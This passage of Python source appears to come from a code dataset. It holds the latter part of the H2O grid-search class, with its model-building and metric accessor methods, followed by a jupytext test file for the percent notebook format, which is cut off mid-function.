training_frame.ncols):\n raise H2OValueError(\"Column %d does not exist in the training frame\" % xi)\n xset.add(training_frame.names[xi])\n else:\n if xi not in training_frame.names:\n raise H2OValueError(\"Column %s not in the training frame\" % xi)\n xset.add(xi)\n x = list(xset)\n parms[\"x\"] = x\n self.build_model(parms)\n\n\n def build_model(self, 
algo_params):\n \"\"\"(internal)\"\"\"\n if algo_params[\"training_frame\"] is None: raise ValueError(\"Missing training_frame\")\n x = algo_params.pop(\"x\")\n y = algo_params.pop(\"y\", None)\n training_frame = algo_params.pop(\"training_frame\")\n validation_frame = algo_params.pop(\"validation_frame\", None)\n is_auto_encoder = (algo_params is not None) and (\"autoencoder\" in algo_params and algo_params[\"autoencoder\"])\n algo = self.model._compute_algo() # unique to grid search\n is_unsupervised = is_auto_encoder or algo == \"pca\" or algo == \"svd\" or algo == \"kmeans\" or algo == \"glrm\"\n if is_auto_encoder and y is not None: raise ValueError(\"y should not be specified for autoencoder.\")\n if not is_unsupervised and y is None: raise ValueError(\"Missing response\")\n if not is_unsupervised:\n y = y if y in training_frame.names else training_frame.names[y]\n self.model._estimator_type = \"classifier\" if training_frame.types[y] == \"enum\" else \"regressor\"\n self._model_build(x, y, training_frame, validation_frame, algo_params)\n\n\n def _model_build(self, x, y, tframe, vframe, kwargs):\n kwargs['training_frame'] = tframe\n if vframe is not None: kwargs[\"validation_frame\"] = vframe\n if is_type(y, int): y = tframe.names[y]\n if y is not None: kwargs['response_column'] = y\n if not is_type(x, list, tuple): x = [x]\n if is_type(x[0], int):\n x = [tframe.names[i] for i in x]\n offset = kwargs[\"offset_column\"]\n folds = kwargs[\"fold_column\"]\n weights = kwargs[\"weights_column\"]\n ignored_columns = list(set(tframe.names) - set(x + [y, offset, folds, weights]))\n kwargs[\"ignored_columns\"] = None if not ignored_columns else [quoted(col) for col in ignored_columns]\n kwargs = dict([(k, kwargs[k].frame_id if isinstance(kwargs[k], H2OFrame) else kwargs[k]) for k in kwargs if\n kwargs[k] is not None]) # gruesome one-liner\n algo = self.model._compute_algo() # unique to grid search\n if self.grid_id is not None: kwargs[\"grid_id\"] = self.grid_id\n rest_ver = kwargs.pop(\"_rest_version\") if \"_rest_version\" in kwargs else None\n\n grid = H2OJob(h2o.api(\"POST /99/Grid/%s\" % algo, data=kwargs), job_type=(algo + \" Grid Build\"))\n\n if self._future:\n self._job = grid\n return\n\n grid.poll()\n\n grid_json = h2o.api(\"GET /99/Grids/%s\" % (grid.dest_key))\n failure_messages_stacks = \"\"\n error_index = 0\n if len(grid_json[\"failure_details\"]) > 0:\n print(\"Errors/Warnings building gridsearch model\\n\")\n# will raise error if no grid model is returned, store error messages here\n\n for error_message in grid_json[\"failure_details\"]:\n if isinstance(grid_json[\"failed_params\"][error_index], dict):\n for h_name in grid_json['hyper_names']:\n print(\"Hyper-parameter: {0}, {1}\".format(h_name,\n grid_json['failed_params'][error_index][h_name]))\n\n if len(grid_json[\"failure_stack_traces\"]) > error_index:\n print(\"failure_details: {0}\\nfailure_stack_traces: \"\n \"{1}\\n\".format(error_message, grid_json['failure_stack_traces'][error_index]))\n failure_messages_stacks += error_message+'\\n'\n error_index += 1\n\n self.models = [h2o.get_model(key['name']) for key in grid_json['model_ids']]\n for model in self.models:\n model._estimator_type = self.model._estimator_type\n\n # get first model returned in list of models from grid search to get model class (binomial, multinomial, etc)\n # sometimes no model is returned due to bad parameter values provided by the user.\n if len(grid_json['model_ids']) > 0:\n first_model_json = h2o.api(\"GET /%d/Models/%s\" %\n (rest_ver or 3, 
grid_json['model_ids'][0]['name']))['models'][0]\n self._resolve_grid(grid.dest_key, grid_json, first_model_json)\n else:\n if len(failure_messages_stacks)>0:\n raise ValueError(failure_messages_stacks)\n else:\n raise ValueError(\"Gridsearch returns no model due to bad parameter values or other reasons....\")\n\n\n def _resolve_grid(self, grid_id, grid_json, first_model_json):\n model_class = H2OGridSearch._metrics_class(first_model_json)\n m = model_class()\n m._id = grid_id\n m._grid_json = grid_json\n # m._metrics_class = metrics_class\n m._parms = self._parms\n self.export_checkpoints_dir = m._grid_json[\"export_checkpoints_dir\"]\n H2OEstimator.mixin(self, model_class)\n self.__dict__.update(m.__dict__.copy())\n\n\n def __getitem__(self, item):\n return self.models[item]\n\n\n def __iter__(self):\n nmodels = len(self.models)\n return (self[i] for i in range(nmodels))\n\n\n def __len__(self):\n return len(self.models)\n\n\n def __repr__(self):\n self.show()\n return \"\"\n\n\n def predict(self, test_data):\n \"\"\"\n Predict on a dataset.\n\n :param H2OFrame test_data: Data to be predicted on.\n :returns: H2OFrame filled with predictions.\n \"\"\"\n return {model.model_id: model.predict(test_data) for model in self.models}\n\n\n def is_cross_validated(self):\n \"\"\"Return True if the model was cross-validated.\"\"\"\n return {model.model_id: model.is_cross_validated() for model in self.models}\n\n\n def xval_keys(self):\n \"\"\"Model keys for the cross-validated model.\"\"\"\n return {model.model_id: model.xval_keys() for model in self.models}\n\n\n def get_xval_models(self, key=None):\n \"\"\"\n Return a Model object.\n\n :param str key: If None, return all cross-validated models; otherwise return the model\n specified by the key.\n :returns: A model or a list of models.\n \"\"\"\n return {model.model_id: model.get_xval_models(key) for model in self.models}\n\n\n def xvals(self):\n \"\"\"Return the list of cross-validated models.\"\"\"\n return {model.model_id: model.xvals for model in self.models}\n\n\n def deepfeatures(self, test_data, layer):\n \"\"\"\n Obtain a hidden layer's details on a dataset.\n\n :param test_data: Data to create a feature space on.\n :param int layer: Index of the hidden layer.\n :returns: A dictionary of hidden layer details for each model.\n \"\"\"\n return {model.model_id: model.deepfeatures(test_data, layer) for model in self.models}\n\n\n def weights(self, matrix_id=0):\n \"\"\"\n Return the frame for the respective weight matrix.\n\n :param: matrix_id: an integer, ranging from 0 to number of layers, that specifies the weight matrix to return.\n :returns: an H2OFrame which represents the weight matrix identified by matrix_id\n \"\"\"\n return {model.model_id: model.weights(matrix_id) for model in self.models}\n\n\n def biases(self, vector_id=0):\n \"\"\"\n Return the frame for the respective bias vector.\n\n :param: vector_id: an integer, ranging from 0 to number of layers, that specifies the bias vector to return.\n :returns: an H2OFrame which represents the bias vector identified by vector_id\n \"\"\"\n return {model.model_id: model.biases(vector_id) for model in self.models}\n\n\n def normmul(self):\n \"\"\"Normalization/Standardization multipliers for numeric predictors.\"\"\"\n return {model.model_id: model.normmul() for model in self.models}\n\n\n def normsub(self):\n \"\"\"Normalization/Standardization offsets for numeric predictors.\"\"\"\n return {model.model_id: model.normsub() for model in self.models}\n\n\n def respmul(self):\n 
\"\"\"Normalization/Standardization multipliers for numeric response.\"\"\"\n return {model.model_id: model.respmul() for model in self.models}\n\n\n def respsub(self):\n \"\"\"Normalization/Standardization offsets for numeric response.\"\"\"\n return {model.model_id: model.respsub() for model in self.models}\n\n\n def catoffsets(self):\n \"\"\"\n Categorical offsets for one-hot encoding\n \"\"\"\n return {model.model_id: model.catoffsets() for model in self.models}\n\n\n def model_performance(self, test_data=None, train=False, valid=False, xval=False):\n \"\"\"\n Generate model metrics for this model on test_data.\n\n :param test_data: Data set for which model metrics shall be computed against. All three of train, valid\n and xval arguments are ignored if test_data is not None.\n :param train: Report the training metrics for the model.\n :param valid: Report the validation metrics for the model.\n :param xval: Report the validation metrics for the model.\n :return: An object of class H2OModelMetrics.\n \"\"\"\n return {model.model_id: model.model_performance(test_data, train, valid, xval) for model in self.models}\n\n\n def scoring_history(self):\n \"\"\"\n Retrieve model scoring history.\n\n :returns: Score history (H2OTwoDimTable)\n \"\"\"\n return {model.model_id: model.scoring_history() for model in self.models}\n\n\n def summary(self, header=True):\n \"\"\"Print a detailed summary of the explored models.\"\"\"\n table = []\n for model in self.models:\n model_summary = model._model_json[\"output\"][\"model_summary\"]\n r_values = list(model_summary.cell_values[0])\n r_values[0] = model.model_id\n table.append(r_values)\n\n # if h2o.can_use_pandas():\n # import pandas\n # pandas.options.display.max_rows = 20\n # print pandas.DataFrame(table,columns=self.col_header)\n # return\n print()\n if header:\n print('Grid Summary:')\n print()\n H2ODisplay(table, header=['Model Id'] + model_summary.col_header[1:], numalign=\"left\", stralign=\"left\")\n\n\n def show(self):\n \"\"\"Print models sorted by metric.\"\"\"\n hyper_combos = itertools.product(*list(self.hyper_params.values()))\n if not self.models:\n c_values = [[idx + 1, list(val)] for idx, val in enumerate(hyper_combos)]\n print(H2OTwoDimTable(\n col_header=['Model', 'Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']'],\n table_header='Grid Search of Model ' + self.model.__class__.__name__, cell_values=c_values))\n else:\n print(self.sorted_metric_table())\n\n\n def varimp(self, use_pandas=False):\n \"\"\"\n Pretty print the variable importances, or return them in a list/pandas DataFrame.\n\n :param bool use_pandas: If True, then the variable importances will be returned as a pandas data frame.\n\n :returns: A dictionary of lists or Pandas DataFrame instances.\n \"\"\"\n return {model.model_id: model.varimp(use_pandas) for model in self.models}\n\n\n def residual_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the residual deviance if this model has the attribute, or None otherwise.\n\n :param bool train: Get the residual deviance for the training set. If both train and valid are False,\n then train is selected by default.\n :param bool valid: Get the residual deviance for the validation set. 
If both train and valid are True,\n then train is selected by default.\n :param bool xval: Get the residual deviance for the cross-validated models.\n\n :returns: the residual deviance, or None if it is not present.\n \"\"\"\n return {model.model_id: model.residual_deviance(train, valid, xval) for model in self.models}\n\n\n def residual_degrees_of_freedom(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the residual degress of freedom if this model has the attribute, or None otherwise.\n\n :param bool train: Get the residual dof for the training set. If both train and valid are False, then\n train is selected by default.\n :param bool valid: Get the residual dof for the validation set. If both train and valid are True, then\n train is selected by default.\n :param bool xval: Get the residual dof for the cross-validated models.\n\n :returns: the residual degrees of freedom, or None if they are not present.\n \"\"\"\n return {model.model_id: model.residual_degrees_of_freedom(train, valid, xval) for model in self.models}\n\n\n def null_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the null deviance if this model has the attribute, or None otherwise.\n\n :param bool train: Get the null deviance for the training set. If both train and valid are False, then\n train is selected by default.\n :param bool valid: Get the null deviance for the validation set. If both train and valid are True, then\n train is selected by default.\n :param bool xval: Get the null deviance for the cross-validated models.\n\n :returns: the null deviance, or None if it is not present.\n \"\"\"\n return {model.model_id: model.null_deviance(train, valid, xval) for model in self.models}\n\n\n def null_degrees_of_freedom(self, train=False, valid=False, xval=False):\n \"\"\"\n Retreive the null degress of freedom if this model has the attribute, or None otherwise.\n\n :param bool train: Get the null dof for the training set. If both train and valid are False, then train is\n selected by default.\n :param bool valid: Get the null dof for the validation set. If both train and valid are True, then train is\n selected by default.\n :param bool xval: Get the null dof for the cross-validated models.\n\n :returns: the null dof, or None if it is not present.\n \"\"\"\n return {model.model_id: model.null_degrees_of_freedom(train, valid, xval) for model in self.models}\n\n\n def pprint_coef(self):\n \"\"\"Pretty print the coefficents table (includes normalized coefficients).\"\"\"\n for i, model in enumerate(self.models):\n print('Model', i)\n model.pprint_coef()\n print()\n\n\n def coef(self):\n \"\"\"Return the coefficients that can be applied to the non-standardized data.\n\n Note: standardize = True by default. If set to False, then coef() returns the coefficients that are fit directly.\n\n \"\"\"\n return {model.model_id: model.coef() for model in self.models}\n\n\n def coef_norm(self):\n \"\"\"Return coefficients fitted on the standardized data (requires standardize = True, which is on by default). 
These coefficients can be used to evaluate variable importance.\n\n \"\"\"\n return {model.model_id: model.coef_norm() for model in self.models}\n\n\n def r2(self, train=False, valid=False, xval=False):\n \"\"\"\n Return the R^2 for this regression model.\n\n The R^2 value is defined to be ``1 - MSE/var``, where ``var`` is computed as ``sigma^2``.\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the R^2 value for the training data.\n :param bool valid: If valid is True, then return the R^2 value for the validation data.\n :param bool xval: If xval is True, then return the R^2 value for the cross validation data.\n\n :returns: The R^2 for this regression model.\n \"\"\"\n return {model.model_id: model.r2(train, valid, xval) for model in self.models}\n\n\n def mse(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the MSE(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the MSE value for the training data.\n :param bool valid: If valid is True, then return the MSE value for the validation data.\n :param bool xval: If xval is True, then return the MSE value for the cross validation data.\n :returns: The MSE for this regression model.\n \"\"\"\n return {model.model_id: model.mse(train, valid, xval) for model in self.models}\n\n\n def logloss(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Log Loss(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Log Loss value for the training data.\n :param bool valid: If valid is True, then return the Log Loss value for the validation data.\n :param bool xval: If xval is True, then return the Log Loss value for the cross validation data.\n\n :returns: The Log Loss for this binomial model.\n \"\"\"\n return {model.model_id: model.logloss(train, valid, xval) for model in self.models}\n\n\n def mean_residual_deviance(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Mean Residual Deviances(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Mean Residual Deviance value for the training data.\n :param bool valid: If valid is True, then return the Mean Residual Deviance value for the validation data.\n :param bool xval: If xval is True, then return the Mean Residual Deviance value for the cross validation data.\n :returns: The Mean Residual Deviance for this regression model.\n \"\"\"\n return {model.model_id: model.mean_residual_deviance(train, valid, xval) for model in self.models}\n\n\n def auc(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the AUC(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n 
:param bool train: If train is True, then return the AUC value for the training data.\n :param bool valid: If valid is True, then return the AUC value for the validation data.\n :param bool xval: If xval is True, then return the AUC value for the validation data.\n\n :returns: The AUC.\n \"\"\"\n return {model.model_id: model.auc(train, valid, xval) for model in self.models}\n\n\n def aic(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the AIC(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the AIC value for the training data.\n :param bool valid: If valid is True, then return the AIC value for the validation data.\n :param bool xval: If xval is True, then return the AIC value for the validation data.\n\n :returns: The AIC.\n \"\"\"\n return {model.model_id: model.aic(train, valid, xval) for model in self.models}\n\n\n def gini(self, train=False, valid=False, xval=False):\n \"\"\"\n Get the Gini Coefficient(s).\n\n If all are False (default), then return the training metric value.\n If more than one options is set to True, then return a dictionary of metrics where the keys are \"train\",\n \"valid\", and \"xval\".\n\n :param bool train: If train is True, then return the Gini Coefficient value for the training data.\n :param bool valid: If valid is True, then return the Gini Coefficient value for the validation data.\n :param bool xval: If xval is True, then return the Gini Coefficient value for the cross validation data.\n\n :returns: The Gini Coefficient for this binomial model.\n \"\"\"\n return {model.model_id: model.gini(train, valid, xval) for model in self.models}\n\n\n def get_hyperparams(self, id, display=True):\n \"\"\"\n Get the hyperparameters of a model explored by grid search.\n\n :param str id: The model id of the model with hyperparameters of interest.\n :param bool display: Flag to indicate whether to display the hyperparameter names.\n\n :returns: A list of the hyperparameters for the specified model.\n \"\"\"\n idx = id if is_type(id, int) else self.model_ids.index(id)\n model = self[idx]\n\n # if cross-validation is turned on, parameters in one of the fold model actuall contains the max_runtime_secs\n # parameter and not the main model that is returned.\n if model._is_xvalidated:\n model = h2o.get_model(model._xval_keys[0])\n\n res = [model.params[h]['actual'][0] if isinstance(model.params[h]['actual'], list)\n else model.params[h]['actual']\n for h in self.hyper_params]\n if display: print('Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']')\n return res\n\n\n def get_hyperparams_dict(self, id, display=True):\n \"\"\"\n Derived and returned the model parameters used to train the particular grid search model.\n\n :param str id: The model id of the model with hyperparameters of interest.\n :param bool display: Flag to indicate whether to display the hyperparameter names.\n\n :returns: A dict of model pararmeters derived from the hyper-parameters used to train this particular model.\n \"\"\"\n idx = id if is_type(id, int) else self.model_ids.index(id)\n model = self[idx]\n\n model_params = dict()\n\n # if cross-validation is turned on, parameters in one of the fold model actual contains the max_runtime_secs\n # parameter and not the main model that is returned.\n if model._is_xvalidated:\n model = 
h2o.get_model(model._xval_keys[0])\n\n for param_name in self.hyper_names:\n model_params[param_name] = model.params[param_name]['actual'][0] if \\\n isinstance(model.params[param_name]['actual'], list) else model.params[param_name]['actual']\n\n if display: print('Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']')\n return model_params\n\n\n def sorted_metric_table(self):\n \"\"\"\n Retrieve summary table of an H2O Grid Search.\n\n :returns: The summary table as an H2OTwoDimTable or a Pandas DataFrame.\n \"\"\"\n summary = self._grid_json[\"summary_table\"]\n if summary is not None: return summary.as_data_frame()\n print(\"No sorted metric table for this grid search\")\n\n\n @staticmethod\n def _metrics_class(model_json):\n model_type = model_json[\"output\"][\"model_category\"]\n if model_type == \"Binomial\":\n model_class = H2OBinomialGridSearch\n elif model_type == \"Clustering\":\n model_class = H2OClusteringGridSearch\n elif model_type == \"Regression\":\n model_class = H2ORegressionGridSearch\n elif model_type == \"Multinomial\":\n model_class = H2OMultinomialGridSearch\n elif model_type == \"Ordinal\":\n model_class = H2OOrdinalGridSearch\n elif model_type == \"AutoEncoder\":\n model_class = H2OAutoEncoderGridSearch\n elif model_type == \"DimReduction\":\n model_class = H2ODimReductionGridSearch\n else:\n raise NotImplementedError(model_type)\n return model_class\n\n\n def get_grid(self, sort_by=None, decreasing=None):\n \"\"\"\n Retrieve an H2OGridSearch instance.\n\n Optionally specify a metric by which to sort models and a sort order.\n Note that if neither cross-validation nor a validation frame is used in the grid search, then the\n training metrics will display in the \"get grid\" output. If a validation frame is passed to the grid, and\n ``nfolds = 0``, then the validation metrics will display. However, if ``nfolds`` > 1, then cross-validation\n metrics will display even if a validation frame is provided.\n\n :param str sort_by: A metric by which to sort the models in the grid space. 
Choices are: ``\"logloss\"``,\n ``\"residual_deviance\"``, ``\"mse\"``, ``\"auc\"``, ``\"r2\"``, ``\"accuracy\"``, ``\"precision\"``, ``\"recall\"``,\n ``\"f1\"``, etc.\n :param bool decreasing: Sort the models in decreasing order of metric if true, otherwise sort in increasing\n order (default).\n\n :returns: A new H2OGridSearch instance optionally sorted on the specified metric.\n \"\"\"\n if sort_by is None and decreasing is None: return self\n\n grid_json = h2o.api(\"GET /99/Grids/%s\" % self._id, data={\"sort_by\": sort_by, \"decreasing\": decreasing})\n grid = H2OGridSearch(self.model, self.hyper_params, self._id)\n grid.models = [h2o.get_model(key['name']) for key in grid_json['model_ids']] # reordered\n first_model_json = h2o.api(\"GET /99/Models/%s\" % grid_json['model_ids'][0]['name'])['models'][0]\n model_class = H2OGridSearch._metrics_class(first_model_json)\n m = model_class()\n m._id = self._id\n m._grid_json = grid_json\n # m._metrics_class = metrics_class\n m._parms = grid._parms\n H2OEstimator.mixin(grid, model_class)\n grid.__dict__.update(m.__dict__.copy())\n return grid\n\n\n # Deprecated functions; left here for backward compatibility\n _bcim = {\n \"giniCoef\": lambda self, *args, **kwargs: self.gini(*args, **kwargs)\n }\n\n\n @deprecated(\"grid.sort_by() is deprecated; use grid.get_grid() instead\")\n def sort_by(self, metric, increasing=True):\n \"\"\"Deprecated since 2016-12-12, use grid.get_grid() instead.\"\"\"\n\n if metric[-1] != ')': metric += '()'\n c_values = [list(x) for x in zip(*sorted(eval('self.' + metric + '.items()'), key=lambda k_v: k_v[1]))]\n c_values.insert(1, [self.get_hyperparams(model_id, display=False) for model_id in c_values[0]])\n if not increasing:\n for col in c_values: col.reverse()\n if metric[-2] == '(': metric = metric[:-2]\n return H2OTwoDimTable(\n col_header=['Model Id', 'Hyperparameters: [' + ', '.join(list(self.hyper_params.keys())) + ']', metric],\n table_header='Grid Search Results for ' + self.model.__class__.__name__,\n cell_values=[list(x) for x in zip(*c_values)])\n"} {"ext": "py", "sha": "1a2fa1bf108cc114e4925cc6529c2d4f8504e65a", "content": "# -*- coding: utf-8 -*-\n\nimport os\nfrom nbformat.v4.nbbase import new_notebook, new_code_cell, new_markdown_cell, new_raw_cell\nfrom jupytext.compare import compare, compare_notebooks\nimport jupytext\n\n\ndef test_read_simple_file(script=\"\"\"# ---\n# title: Simple file\n# ---\n\n# %% [markdown]\n# This is a markdown cell\n\n# %% [md]\n# This is also a markdown cell\n\n# %% [raw]\n# This is a raw cell\n\n# %%% sub-cell title\n# This is a sub-cell\n\n# %%%% sub-sub-cell title\n# This is a sub-sub-cell\n\n# %% And now a code cell\n1 + 2 + 3 + 4\n5\n6\n# %%magic # this is a commented magic, not a cell\n\n7\n\"\"\"):\n nb = jupytext.reads(script, 'py:percent')\n compare_notebooks(new_notebook(cells=[\n new_raw_cell('---\\ntitle: Simple file\\n---'),\n new_markdown_cell('This is a markdown cell'),\n new_markdown_cell('This is also a markdown cell', metadata={'region_name': 'md'}),\n new_raw_cell('This is a raw cell'),\n new_code_cell('# This is a sub-cell', metadata={'title': 'sub-cell title', 'cell_depth': 1}),\n new_code_cell('# This is a sub-sub-cell', metadata={'title': 'sub-sub-cell title', 'cell_depth': 2}),\n new_code_cell('''1 + 2 + 3 + 4\n5\n6\n%%magic # this is a commented magic, not a cell\n\n7''', metadata={'title': 'And now a code cell'})]), nb)\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_read_cell_with_metadata(\n 
script=\"\"\"# %% a code cell with parameters {\"tags\": [\"parameters\"]}\na = 3\n\"\"\"):\n nb = jupytext.reads(script, 'py:percent')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'code'\n assert nb.cells[0].source == 'a = 3'\n assert nb.cells[0].metadata == {\n 'title': 'a code cell with parameters',\n 'tags': ['parameters']}\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_read_nbconvert_script(script=\"\"\"\n# coding: utf-8\n\n# A markdown cell\n\n# In[1]:\n\n\nimport pandas as pd\n\npd.options.display.max_rows = 6\npd.options.display.max_columns = 20\n\n\n# Another markdown cell\n\n# In[2]:\n\n\n1 + 1\n\n\n# Again, a markdown cell\n\n# In[33]:\n\n\n2 + 2\n\n\n# \n\n\n3 + 3\n\"\"\"):\n assert jupytext.formats.guess_format(script, '.py')[0] == 'percent'\n nb = jupytext.reads(script, '.py')\n assert len(nb.cells) == 5\n\n\ndef test_read_remove_blank_lines(script=\"\"\"# %%\nimport pandas as pd\n\n# %% Display a data frame\ndf = pd.DataFrame({'A': [1, 2], 'B': [3, 4]},\n index=pd.Index(['x0', 'x1'], name='x'))\ndf\n\n# %% Pandas plot {\"tags\": [\"parameters\"]}\ndf.plot(kind='bar')\n\n\n# %% sample class\nclass MyClass:\n pass\n\n\n# %% a function\ndef f(x):\n return 42 * x\n\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n assert len(nb.cells) == 5\n for i in range(5):\n assert nb.cells[i].cell_type == 'code'\n assert not nb.cells[i].source.startswith('\\n')\n assert not nb.cells[i].source.endswith('\\n')\n\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_no_crash_on_square_bracket(script=\"\"\"# %% In [2]\nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n compare(script2, script)\n\n\ndef test_nbconvert_cell(script=\"\"\"# In[2]:\nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\nprint('Hello')\n\"\"\"\n compare(script2, expected)\n\n\ndef test_nbformat_v3_nbpy_cell(script=\"\"\"# \nprint('Hello')\n\"\"\"):\n nb = jupytext.reads(script, 'py')\n script2 = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\nprint('Hello')\n\"\"\"\n compare(script2, expected)\n\n\ndef test_multiple_empty_cells():\n nb = new_notebook(cells=[new_code_cell(), new_code_cell(), new_code_cell()],\n metadata={'jupytext': {'notebook_metadata_filter': '-all'}})\n text = jupytext.writes(nb, 'py:percent')\n expected = \"\"\"# %%\n\n# %%\n\n# %%\n\"\"\"\n compare(text, expected)\n nb2 = jupytext.reads(text, 'py:percent')\n nb2.metadata = nb.metadata\n compare(nb2, nb)\n\n\ndef test_first_cell_markdown_191():\n text = \"\"\"# %% [markdown]\n# Docstring\n\n# %%\nfrom math import pi\n\n# %% [markdown]\n# Another markdown cell\n\"\"\"\n\n nb = jupytext.reads(text, 'py')\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[1].cell_type == 'code'\n assert nb.cells[2].cell_type == 'markdown'\n\n\ndef test_multiline_comments_in_markdown_1():\n text = \"\"\"# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\"\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"a\\nlong\\ncell\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_in_markdown_2():\n text = '''# %% [markdown]\n\"\"\"\na\nlong\ncell\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == 
\"a\\nlong\\ncell\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_format_option():\n text = '''# %% [markdown]\n\"\"\"\na\nlong\ncell\n\"\"\"\n'''\n nb = new_notebook(cells=[new_markdown_cell(\"a\\nlong\\ncell\")],\n metadata={'jupytext': {'cell_markers': '\"\"\"',\n 'notebook_metadata_filter': '-all'}})\n py = jupytext.writes(nb, 'py:percent')\n compare(py, text)\n\n\ndef test_multiline_comments_in_raw_cell():\n text = '''# %% [raw]\n\"\"\"\nsome\ntext\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'raw'\n assert nb.cells[0].source == \"some\\ntext\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_multiline_comments_in_markdown_cell_no_line_return():\n text = '''# %% [markdown]\n\"\"\"a\nlong\ncell\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"a\\nlong\\ncell\"\n\n\ndef test_multiline_comments_in_markdown_cell_is_robust_to_additional_cell_marker():\n text = '''# %% [markdown]\n\"\"\"\nsome text, and a fake cell marker\n# %% [raw]\n\"\"\"\n'''\n nb = jupytext.reads(text, 'py')\n assert len(nb.cells) == 1\n assert nb.cells[0].cell_type == 'markdown'\n assert nb.cells[0].source == \"some text, and a fake cell marker\\n# %% [raw]\"\n py = jupytext.writes(nb, 'py')\n compare(py, text)\n\n\ndef test_cell_markers_option_in_contents_manager(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py:percent',\n 'notebook_metadata_filter': '-all',\n 'cell_markers': \"'''\"}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"# %%\n1 + 1\n\n# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_default_cell_markers_in_contents_manager(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n cm.default_cell_markers = \"'''\"\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py:percent',\n 'notebook_metadata_filter': '-all'}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n assert os.path.isfile(tmp_ipynb)\n assert os.path.isfile(tmp_py)\n\n with open(tmp_py) as fp:\n text = fp.read()\n\n compare(text, \"\"\"# %%\n1 + 1\n\n# %% [markdown]\n'''\na\nlong\ncell\n'''\n\"\"\")\n\n nb2 = jupytext.read(tmp_py)\n compare_notebooks(nb, nb2)\n\n\ndef test_default_cell_markers_in_contents_manager_does_not_impact_light_format(tmpdir):\n tmp_ipynb = str(tmpdir.join('notebook.ipynb'))\n tmp_py = str(tmpdir.join('notebook.py'))\n\n cm = jupytext.TextFileContentsManager()\n cm.root_dir = str(tmpdir)\n cm.default_cell_markers = \"'''\"\n\n nb = new_notebook(cells=[new_code_cell('1 + 1'), new_markdown_cell('a\\nlong\\ncell')],\n metadata={'jupytext': {'formats': 'ipynb,py',\n 'notebook_metadata_filter': '-all'}})\n cm.save(model=dict(type='notebook', content=nb), path='notebook.ipynb')\n\n 
